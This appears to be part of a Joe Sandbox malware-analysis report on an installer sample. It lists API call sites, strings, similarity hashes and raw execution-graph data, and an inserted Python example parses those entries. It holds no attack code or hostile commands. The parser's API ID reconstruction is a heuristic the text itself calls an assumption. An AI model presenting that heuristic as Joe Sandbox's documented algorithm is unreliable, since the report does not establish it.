                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                              • String ID: Version
                                                                                              • API String ID: 512980652-315105994
                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                              • String ID:
                                                                                              • API String ID: 2883127279-0
                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                              APIs
                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                              • String ID: !N~
                                                                                              • API String ID: 623250636-529124213
                                                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3509786178-2769509956
                                                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
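
The per-function entries above (APIs with call-site refs, Strings with xrefs, and the Similarity identifiers) are easier to work with as records than by eye, for example to list every function that calls CreateProcessW or to pivot on an API String ID into other reports. The following Python is an added example written for this page, not Joe Sandbox's own tooling. It parses three of the entries shown above (copied inline as constructed sample input) into records, indexes them by a Similarity identifier, and rebuilds the API ID field with a heuristic inferred from those three entries only (A/W suffix dropped, names grouped by call count and joined with '$', CamelCase fragments sorted in ASCII order); that heuristic is an assumption, not documented Joe Sandbox behaviour.

```python
"""Parse the per-function 'APIs / Strings / Similarity' entries of a Joe Sandbox
report and pivot on them. Added example; not Joe Sandbox's own code."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed input: three entries copied from the report above, indentation removed.
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Similarity
• API ID: CloseCreateHandleProcess
• API String ID: 3712363035-66219284
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
• lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
• CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
• lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]+): )?"
                    r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
STRIP_AW = re.compile(r"(?<=[a-z])[AW]$")        # CreateProcessW -> CreateProcess
CAMEL = re.compile(r"[A-Z]+[a-z0-9]*|[a-z0-9]+")  # CloseHandle -> Close, Handle

@dataclass
class ApiCall:
    name: str                          # CreateProcessW
    module: str                        # KERNEL32
    args: list                         # argument column as listed; '?' = unresolved
    ref: int                           # call-site address in the dump
    subcall_of: "int | None" = None    # "Part of subcall function" address, if any

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, xref address)
    similarity: dict = field(default_factory=dict)  # API ID, String ID, hashes ...

def parse_entries(text):
    """One FunctionEntry per 'APIs' block; sections not listed above are skipped."""
    entries, entry, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line in SECTIONS:
            if line == "APIs":                   # every entry opens with its API list
                entry = FunctionEntry()
                entries.append(entry)
            section = line
        elif entry is None or not line:
            continue
        elif section == "APIs":
            if m := API_RE.match(line):          # lines that are not a call are skipped
                sub, name, module, args, ref = m.groups()
                # A literal comma inside a string argument would be split here too.
                entry.apis.append(ApiCall(name, module, args.split(","), int(ref, 16),
                                          int(sub, 16) if sub else None))
        elif section == "Strings":
            value, sep, xref = line.rpartition(", xrefs: ")
            if sep:
                entry.strings.append((value, int(xref, 16)))
        elif section == "Similarity":
            key, _, value = line.partition(":")  # 'String ID:' may carry no value
            entry.similarity[key.strip()] = value.strip()
    return entries

def index_by(entries, key):
    """Entry indexes grouped by a Similarity identifier such as 'API String ID',
    the handle for finding the same function in other reports."""
    idx = defaultdict(list)
    for i, e in enumerate(entries):
        idx[e.similarity.get(key, "")].append(i)
    return dict(idx)

def api_id(entry):
    """Rebuild 'API ID' from the API names. Heuristic inferred from the entries on
    this page, not a documented Joe Sandbox algorithm: drop the A/W suffix, group
    names by call count (most frequent first, joined by '$'), split at CamelCase
    boundaries and sort the fragments in ASCII order."""
    counts = Counter(STRIP_AW.sub("", c.name) for c in entry.apis)
    groups = defaultdict(list)
    for name, n in counts.items():
        groups[n].append(name)
    return "$".join("".join(sorted(f for name in groups[n] for f in CAMEL.findall(name)))
                    for n in sorted(groups, reverse=True))
```

Two details of the sample are worth noticing when reading such entries: the CloseHandle marked "Part of subcall function" in the RMDir entry still contributes to that entry's API ID, and the RMDir entry's String ID is the text of the first lstrlenW argument even though its Strings section is empty. String ID and API String ID are therefore not reconstructed here, because the report does not show how they are derived.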

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:2.7%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:130
                                                                                              execution_graph: rendered in the original report as an interactive call graph (per node: id, address, label; edges written as a->b); the serialized node and edge data is not reproducible as text. Windows API calls that appear as node labels in the graph: CharUpperBuffW, CloseHandle, CreateThread, CreateToolhelp32Snapshot, DecodePointer, DestroyWindow, DispatchMessageW, DuplicateHandle, EncodePointer, EnterCriticalSection, ExitProcess, GetClassLongW, GetCurrentProcess, GetExitCodeProcess, GetLastError, GetMessageW, GetModuleHandleExW, GetProcAddress, GetStdHandle, InitializeCriticalSectionAndSpinCount, InterlockedExchange, IsDialogMessageW, LeaveCriticalSection, LockWindowUpdate, OleInitialize, PeekMessageW, Process32FirstW, Process32NextW, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadFile, RegisterWindowMessageW, RtlAllocateHeap, RtlFreeHeap, Sleep, timeGetTime, TranslateAcceleratorW, TranslateMessage, VariantClear, WaitForSingleObject. The remaining labels are CRT and library routines (_memmove, _wcscmp, __NMSG_WRITE, __getptd_noexit, __fcloseall, __lock, __itow, __i64tow, std::exception::exception, Mailbox). Among the edges, a CreateToolhelp32Snapshot -> Process32FirstW -> Process32NextW -> CloseHandle loop and a WaitForSingleObject -> GetExitCodeProcess -> CloseHandle sequence are visible.
98459->98423 98460->98425 98461->98276 98462->98276 98463->98276 98464->98276 98465->98276 98466->98276 98467->98282 98468->98276 98469->98276 98470->98303 98471->98292 98472->98303 98473->98302 98474->98303 98476 634d37 84 API calls 98475->98476 98477 6ad203 98476->98477 98482 6ad24a Mailbox 98477->98482 98513 6ade8e 98477->98513 98479 6ad617 98564 6adfb1 92 API calls Mailbox 98479->98564 98482->98308 98483 6ad29b Mailbox 98483->98482 98486 634d37 84 API calls 98483->98486 98500 6ad4a2 98483->98500 98546 69fc0d 59 API calls 2 library calls 98483->98546 98547 6ad6c8 61 API calls 2 library calls 98483->98547 98484 6ad626 98485 6ad4b0 98484->98485 98487 6ad632 98484->98487 98526 6ad057 98485->98526 98486->98483 98487->98482 98492 6ad4e9 98541 650e38 98492->98541 98495 6ad51c 98549 6347be 98495->98549 98496 6ad503 98548 69a48d 89 API calls 4 library calls 98496->98548 98499 6ad50e GetCurrentProcess TerminateProcess 98499->98495 98500->98479 98500->98485 98505 6ad68d 98505->98482 98509 6ad6a1 FreeLibrary 98505->98509 98506 6ad554 98561 6add32 107 API calls _free 98506->98561 98509->98482 98512 6ad565 98512->98505 98562 634230 59 API calls Mailbox 98512->98562 98563 63523c 59 API calls 98512->98563 98565 6add32 107 API calls _free 98512->98565 98514 641aa4 59 API calls 98513->98514 98515 6adea9 CharLowerBuffW 98514->98515 98566 68f903 98515->98566 98519 641207 59 API calls 98520 6adee2 98519->98520 98573 641462 59 API calls 2 library calls 98520->98573 98522 6adef9 98523 641981 59 API calls 98522->98523 98525 6adf05 Mailbox 98523->98525 98524 6adf41 Mailbox 98524->98483 98525->98524 98574 6ad6c8 61 API calls 2 library calls 98525->98574 98527 6ad072 98526->98527 98531 6ad0c7 98526->98531 98528 650fe6 Mailbox 59 API calls 98527->98528 98529 6ad094 98528->98529 98530 650fe6 Mailbox 59 API calls 98529->98530 98529->98531 98530->98529 98532 6ae139 98531->98532 98533 6ae362 Mailbox 98532->98533 98537 6ae15c _strcat _wcscpy __NMSG_WRITE 98532->98537 98533->98492 98534 6350d5 
59 API calls 98534->98537 98535 63502b 59 API calls 98535->98537 98536 635087 59 API calls 98536->98537 98537->98533 98537->98534 98537->98535 98537->98536 98538 634d37 84 API calls 98537->98538 98539 65593c 58 API calls __crtGetStringTypeA_stat 98537->98539 98577 695e42 61 API calls 2 library calls 98537->98577 98538->98537 98539->98537 98542 650e4d 98541->98542 98543 650ee5 CreateToolhelp32Snapshot 98542->98543 98544 650eb3 98542->98544 98545 650ed3 CloseHandle 98542->98545 98543->98544 98544->98495 98544->98496 98545->98544 98546->98483 98547->98483 98548->98499 98550 6347c6 98549->98550 98551 650fe6 Mailbox 59 API calls 98550->98551 98552 6347d4 98551->98552 98554 6347e0 98552->98554 98578 6346ec 59 API calls Mailbox 98552->98578 98555 634540 98554->98555 98579 634650 98555->98579 98557 63454f 98558 650fe6 Mailbox 59 API calls 98557->98558 98559 6345eb 98557->98559 98558->98559 98559->98512 98560 634230 59 API calls Mailbox 98559->98560 98560->98506 98561->98512 98562->98512 98563->98512 98564->98484 98565->98512 98567 68f92e __NMSG_WRITE 98566->98567 98568 68f96d 98567->98568 98571 68f963 98567->98571 98572 68fa14 98567->98572 98568->98519 98568->98525 98571->98568 98575 6414db 61 API calls 98571->98575 98572->98568 98576 6414db 61 API calls 98572->98576 98573->98522 98574->98524 98575->98571 98576->98572 98577->98537 98578->98554 98580 634659 Mailbox 98579->98580 98581 66d6ec 98580->98581 98586 634663 98580->98586 98582 650fe6 Mailbox 59 API calls 98581->98582 98583 66d6f8 98582->98583 98583->98583 98584 63466a 98584->98557 98586->98584 98587 635190 59 API calls Mailbox 98586->98587 98587->98586 98591 6502df 98588->98591 98589 6502e7 98589->98312 98591->98589 98592 6a2db2 InternetCloseHandle InternetCloseHandle WaitForSingleObject 98591->98592 98592->98591 98593->98324 98594->98324 98595->98332 98596->98342 98597->98340 98599 6aa918 98598->98599 98604 6aa970 98598->98604 98600 650fe6 Mailbox 59 API calls 98599->98600 98603 6aa93a 98600->98603 98601 650fe6 
Mailbox 59 API calls 98601->98603 98603->98601 98603->98604 98630 68715b 59 API calls Mailbox 98603->98630 98604->98367 98606 6978ac 98605->98606 98607 6978e3 98605->98607 98606->98607 98608 650fe6 Mailbox 59 API calls 98606->98608 98609 686ebc 98607->98609 98608->98607 98610 686f06 98609->98610 98615 686f1c Mailbox 98609->98615 98613 641a36 59 API calls 98610->98613 98611 686f5a 98616 63a820 266 API calls 98611->98616 98612 686f47 98614 6ac355 266 API calls 98612->98614 98613->98615 98624 686f53 98614->98624 98615->98611 98615->98612 98620 686f91 98616->98620 98618 687002 98618->98394 98619 686fdc 98619->98624 98636 69a48d 89 API calls 4 library calls 98619->98636 98620->98619 98622 686fc1 98620->98622 98620->98624 98631 68706d 98622->98631 98637 686cf1 59 API calls Mailbox 98624->98637 98625->98394 98626->98377 98627->98383 98628->98395 98629->98399 98630->98603 98632 687085 98631->98632 98638 6af1b2 98632->98638 98643 6a495b 98632->98643 98633 6870d9 98633->98624 98636->98624 98637->98618 98639 634d37 84 API calls 98638->98639 98640 6af1cf 98639->98640 98641 694148 66 API calls 98640->98641 98642 6af1de 98641->98642 98642->98633 98644 650fe6 Mailbox 59 API calls 98643->98644 98645 6a496c 98644->98645 98652 64433f 98645->98652 98648 634d37 84 API calls 98649 6a498d GetEnvironmentVariableW 98648->98649 98655 697a51 59 API calls Mailbox 98649->98655 98651 6a49aa 98651->98633 98653 650fe6 Mailbox 59 API calls 98652->98653 98654 644351 98653->98654 98654->98648 98655->98651 98657 694d09 98656->98657 98661 694cf0 98656->98661 98666 6537c3 59 API calls __wcstoi64 98657->98666 98660 694d0f 98660->98408 98661->98657 98661->98660 98665 65385c GetStringTypeW _iswctype 98661->98665 98662->98408 98663->98408 98664->98408 98665->98661 98666->98660 98668 633c43 98667->98668 98669 633e11 98667->98669 98670 641207 59 API calls 98668->98670 98673 633c54 98668->98673 98669->98192 98671 633e73 98670->98671 98672 652f70 __cinit 67 API calls 98671->98672 98672->98673 98673->98192 
